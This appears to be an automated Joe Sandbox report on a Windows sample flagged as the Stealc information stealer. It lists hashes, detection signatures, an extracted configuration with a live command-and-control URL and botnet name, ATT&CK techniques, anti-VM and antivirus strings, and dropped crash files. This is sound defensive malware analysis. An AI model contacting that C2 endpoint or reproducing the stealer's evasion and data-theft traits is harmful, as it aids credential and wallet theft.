Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543326
MD5:8695564cd767158ca851e966afaea1be
SHA1:9e09cc44a9690ddc846a3d0b850fe324db91b721
SHA256:a73bfdae65dadc72f634652cbd12579f0f57448a2cd52d34b4892a937bba6126
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
PE file has a writeable .text section
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to read the PEB
Found potential string decryption / allocating functions
One or more processes crash
PE file does not import any functions
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8695564CD767158CA851E966AFAEA1BE)
    • WerFault.exe (PID: 6976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    file.exeJoeSecurity_StealcYara detected StealcJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6752JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.0.file.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: 0.0.file.exe.400000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                Source: file.exeReversingLabs: Detection: 52%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                System Summary

                barindex
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004045C0 appears 288 times
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168
                Source: file.exeStatic PE information: No import functions for PE file found
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal96.troj.evad.winEXE@2/5@0/0
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6752
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f122f969-d4a1-4d63-a877-63806614aad2Jump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: z .dllJump to behavior
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: Amcache.hve.3.drBinary or memory string: VMware
                Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: file.exe, type: SAMPLE
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6752, type: MEMORYSTR
                Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: file.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: file.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                1
                Process Injection
                1
                Virtualization/Sandbox Evasion
                OS Credential Dumping21
                Security Software Discovery
                Remote ServicesData from Local System1
                Application Layer Protocol
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory1
                Virtualization/Sandbox Evasion
                Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager1
                System Information Discovery
                SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe53%ReversingLabsWin32.Trojan.Stealerc
                file.exe100%AviraHEUR/AGEN.1352833
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://upx.sf.net0%URL Reputationsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/e2b1563c6670f193.phptrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://upx.sf.netAmcache.hve.3.drfalse
                  • URL Reputation: safe
                  unknown
                  No contacted IP infos
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1543326
                  Start date and time:2024-10-27 17:51:03 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 2s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal96.troj.evad.winEXE@2/5@0/0
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 20
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target file.exe, PID 6752 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: file.exe
                  TimeTypeDescription
                  12:52:09API Interceptor1x Sleep call for process: WerFault.exe modified
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.624102125069693
                  Encrypted:false
                  SSDEEP:192:cJ9ZgWGTA66kDvnPlD0NXfAI3jEzuiFCZ24IO8TVB:iNa6SndwNXfXjEzuiFCY4IO8X
                  MD5:88898FA28C7AFCC18745EF1E2665C5E1
                  SHA1:D9912E50FF0BFCB69C31CA16F5B83BD57ABD0BBE
                  SHA-256:D4F38AA3594D7A084B1224354B4653287CD797BD22EBAFAB89B0DC7C7CDDDD19
                  SHA-512:97E6B31023D2A7EC408DBAD49C35D28D3556704B1B3A4A80972CC7E8C766ABD412F869BB82087555646838C5E2768F9915784760F40D3092F029901F080088D2
                  Malicious:true
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.2.1.5.1.5.5.0.1.6.7.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.2.1.5.1.5.8.4.5.4.1.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.8.b.4.5.1.7.-.f.d.a.8.-.4.f.6.b.-.a.9.d.e.-.2.f.1.f.b.d.4.a.f.2.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.b.5.b.4.3.5.-.4.0.b.a.-.4.8.9.1.-.8.e.8.0.-.7.2.5.0.a.f.5.a.6.b.2.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.0.-.0.0.0.1.-.0.0.1.4.-.9.5.a.4.-.7.f.8.7.9.0.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.e.0.9.c.c.4.4.a.9.6.9.0.d.d.c.8.4.6.a.3.d.0.b.8.5.0.f.e.3.2.4.d.b.9.1.b.7.2.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Sun Oct 27 16:51:55 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):25888
                  Entropy (8bit):1.9483084314963992
                  Encrypted:false
                  SSDEEP:96:5e8XNpw6GEGiBYgti7nao7q1fdZKMbeeeI1z6Ju/ZmWI/WI3II5BsN/e0v:zZ91tOaF1fdZKGeE1zawZGBsdP
                  MD5:087B5BEC47F60CB3B4E94878B73A49B3
                  SHA1:A68E6BF201FB6FF4BDFC7D45039A2D37D960713A
                  SHA-256:3B7C0F99C0A2FA2A387071F2C61FD73E201729F9B801A3A1EC94A91704316F9C
                  SHA-512:A7192F90CECD73BD01E0B9D1D8CC4AD08D92A769686120520943D76DAB6D031338B990D1041CDAE8E81A4CBD762FB5CCDD9795AFF36F33EDC8B4F05E1E3BEA0E
                  Malicious:false
                  Reputation:low
                  Preview:MDMP..a..... ........o.g............d...............l.......................T.......8...........T...........p....[......................................................................................................eJ......|.......GenuineIntel............T.......`....o.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8270
                  Entropy (8bit):3.6902521499963292
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJyC46O6Y9bSUxgmfBnJbWOapxt89bRysfsZgt7m:R6lXJO6O6YhSUxgmfxJbWOHRxfIz
                  MD5:429F98C27A4861E5089D77418F8CDAF2
                  SHA1:D1D95358AAD709983F2E209E3F9C09B19B79D94B
                  SHA-256:13E58C56A986D208D9FD1AA279D336BB6CE7480E00C011007F7B65D0C8DEB79D
                  SHA-512:17DDEEA7C682564273F6EBD3BC681D74D64211C5C509B7759EF4BB9E6DDE1DA8D18616EC2257FD6B509DD8454A32160AC3373D6414EB5F58C4E1C55F5CF546CD
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.5.2.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4555
                  Entropy (8bit):4.428779080972921
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zskJg77aI9W5WpW8VY9Ym8M4JguFBd+q8AR0pUxred:uIjfiI7wI7VFJtdh0psred
                  MD5:F5D81A94032C6AFBB287C093BC4AA221
                  SHA1:172ADF583B26AA47D386E1977F34FE7F9DC8FA50
                  SHA-256:A9B4FA1BF62CDD5302842CE223C4D0D8096F95E1CCCFF7DFA7EBB5B3F96AA056
                  SHA-512:558BC2E051BDE020B6A9426BD8CEA5F1419EEB48FBFFCB026C4578370B8E55178DE959E52CB524087FC98177C46135F671A71795EBEFA3A5311D038C63C2874F
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="562074" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.465307673921024
                  Encrypted:false
                  SSDEEP:6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbD:kXD94+WlLZMM6YFH1+D
                  MD5:91B129A7BDDDE8A0ADC6BF31DA4D5ED4
